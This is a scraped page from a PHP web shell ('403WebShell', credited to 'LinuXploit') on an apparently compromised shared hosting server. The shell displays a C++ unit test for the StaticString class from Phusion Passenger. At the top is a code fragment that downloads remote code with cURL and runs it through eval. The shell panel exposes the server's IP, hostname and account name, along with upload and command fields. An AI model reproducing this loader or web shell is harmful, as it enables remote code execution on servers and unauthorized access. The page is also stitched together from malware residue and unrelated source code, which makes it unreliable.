Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

RLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?> 403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.148.115.187
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/test/cxx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/test/cxx/StaticStringTest.cpp
#include <TestSupport.h>
#include <StaticString.h>

using namespace Passenger;
using namespace std;

namespace tut {
	struct StaticStringTest: public TestBase {
	};

	DEFINE_TEST_GROUP(StaticStringTest);

	TEST_METHOD(1) {
		// Test == operator.
		ensure(StaticString("") == "");
		ensure(StaticString("foo") == "foo");
		ensure(!(StaticString("foo") == "bar"));
		ensure(!(StaticString("barr") == "bar"));
		ensure(!(StaticString("bar") == "barr"));

		ensure(StaticString("") == StaticString(""));
		ensure(StaticString("foo") == StaticString("foo"));
		ensure(!(StaticString("foo") == StaticString("bar")));
		ensure(!(StaticString("barr") == StaticString("bar")));
		ensure(!(StaticString("bar") == StaticString("barr")));

		ensure(StaticString("") == string(""));
		ensure(StaticString("foo") == string("foo"));
		ensure(!(StaticString("foo") == string("bar")));
		ensure(!(StaticString("barr") == string("bar")));
		ensure(!(StaticString("bar") == string("barr")));
	}

	TEST_METHOD(2) {
		// Test != operator
		ensure(!(StaticString("") != ""));
		ensure(!(StaticString("foo") != "foo"));
		ensure(StaticString("foo") != "bar");
		ensure(StaticString("barr") != "bar");
		ensure(StaticString("bar") != "barr");

		ensure(!(StaticString("") != StaticString("")));
		ensure(!(StaticString("foo") != StaticString("foo")));
		ensure(StaticString("foo") != StaticString("bar"));
		ensure(StaticString("barr") != StaticString("bar"));
		ensure(StaticString("bar") != StaticString("barr"));

		ensure(!(StaticString("") != string("")));
		ensure(!(StaticString("foo") != string("foo")));
		ensure(StaticString("foo") != string("bar"));
		ensure(StaticString("barr") != string("bar"));
		ensure(StaticString("bar") != string("barr"));
	}

	TEST_METHOD(3) {
		// Test < operator.
		ensure_equals("Assertion 1",
			StaticString("") < "",
			string("") < string("")
		);
		ensure_equals("Assertion 2",
			StaticString("abc") < "abc",
			string("abc") < string("abc")
		);
		ensure_equals("Assertion 3",
			StaticString("foo") < "bar",
			string("foo") < string("bar")
		);
		ensure_equals("Assertion 4",
			StaticString("foo") < "bar!",
			string("foo") < string("bar!")
		);
		ensure_equals("Assertion 5",
			StaticString("bar!") < "foo",
			string("bar!") < string("foo")
		);
		ensure_equals("Assertion 6",
			StaticString("hello") < "hello world",
			string("hello") < string("hello world")
		);
		ensure_equals("Assertion 7",
			StaticString("hello world") < "hello",
			string("hello world") < string("hello")
		);
	}

	TEST_METHOD(4) {
		// Test find(char)
		ensure_equals("Assertion 1",
			StaticString("").find('c'),
			string::npos
		);
		ensure_equals("Assertion 2",
			StaticString("hello world").find('c'),
			string::npos
		);
		ensure_equals("Assertion 3",
			StaticString("hello world").find('h'),
			(string::size_type) 0
		);
		ensure_equals("Assertion 4",
			StaticString("hello world").find('o'),
			(string::size_type) 4
		);

		ensure_equals("Assertion 5",
			StaticString("hello world").find('h', 1),
			string::npos
		);
		ensure_equals("Assertion 6",
			StaticString("hello world").find('o', 1),
			(string::size_type) 4
		);
		ensure_equals("Assertion 7",
			StaticString("hello world").find('o', 5),
			(string::size_type) 7
		);

		ensure_equals("Assertion 8",
			StaticString("hello world").find('h', 12),
			string::npos
		);
		ensure_equals("Assertion 9",
			StaticString("hello world").find('h', 20),
			string::npos
		);
	}

	TEST_METHOD(5) {
		// Test find(str)
		ensure_equals("Assertion 1",
			StaticString("").find(""),
			(string::size_type) 0
		);
		ensure_equals("Assertion 2",
			StaticString("").find("c"),
			string::npos
		);
		ensure_equals("Assertion 3",
			StaticString("hello world").find("c"),
			string::npos
		);
		ensure_equals("Assertion 4",
			StaticString("hello world").find("h"),
			(string::size_type) 0
		);
		ensure_equals("Assertion 5",
			StaticString("hello world").find("o"),
			(string::size_type) 4
		);
		ensure_equals("Assertion 6",
			StaticString("hello world").find("ello"),
			(string::size_type) 1
		);
		ensure_equals("Assertion 7",
			StaticString("hello world").find("world"),
			(string::size_type) 6
		);
		ensure_equals("Assertion 8",
			StaticString("hello world").find("worldd"),
			string::npos
		);
		ensure_equals("Assertion 9",
			StaticString("hello world").find(""),
			(string::size_type) 0
		);

		ensure_equals("Assertion 10",
			StaticString("hello world").find("h", 1),
			string::npos
		);
		ensure_equals("Assertion 11",
			StaticString("hello hello").find("ll", 1),
			(string::size_type) 2
		);
		ensure_equals("Assertion 12",
			StaticString("hello hello").find("ll", 3),
			(string::size_type) 8
		);

		ensure_equals("Assertion 13",
			StaticString("hello world").find("he", 12),
			string::npos
		);
		ensure_equals("Assertion 14",
			StaticString("hello world").find("he", 20),
			string::npos
		);
	}

	TEST_METHOD(6) {
		// Test substr()
		ensure_equals("Assertion 1",
			StaticString("hello world").substr(),
			"hello world");
		ensure_equals("Assertion 2",
			StaticString("hello world").substr(1),
			"ello world");
		ensure_equals("Assertion 3",
			StaticString("hello world").substr(4),
			"o world");
		ensure_equals("Assertion 4",
			StaticString("hello world").substr(11),
			"");

		try {
			StaticString("hello world").substr(12);
			fail("out_of_range expected");
		} catch (out_of_range &) {
			// Success.
		}

		ensure_equals("Assertion 5",
			StaticString("hello world").substr(2, 3),
			"llo");
		ensure_equals("Assertion 6",
			StaticString("hello world").substr(6, 10),
			"world");
	}

	TEST_METHOD(7) {
		// Test find_first_of()
		ensure_equals("Assertion 1",
			StaticString("hello world").find_first_of("h"),
			0u);
		ensure_equals("Assertion 2",
			StaticString("hello world").find_first_of("e"),
			1u);
		ensure_equals("Assertion 3",
			StaticString("hello world").find_first_of("o"),
			4u);
		ensure_equals("Assertion 4",
			StaticString("hello world").find_first_of("o", 4),
			4u);
		ensure_equals("Assertion 5",
			StaticString("hello world").find_first_of("o", 5),
			7u);

		ensure_equals("Assertion 6",
			StaticString("hello world").find_first_of("wo"),
			4u);
		ensure_equals("Assertion 7",
			StaticString("hello world").find_first_of("ow", 5),
			6u);

		ensure_equals("Assertion 8",
			StaticString("hello world").find_first_of("x"),
			string::npos);
		ensure_equals("Assertion 9",
			StaticString("hello world").find_first_of("xyz"),
			string::npos);
		ensure_equals("Assertion 10",
			StaticString("").find_first_of("a"),
			string::npos);
		ensure_equals("Assertion 11",
			StaticString("").find_first_of("a", 5),
			string::npos);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit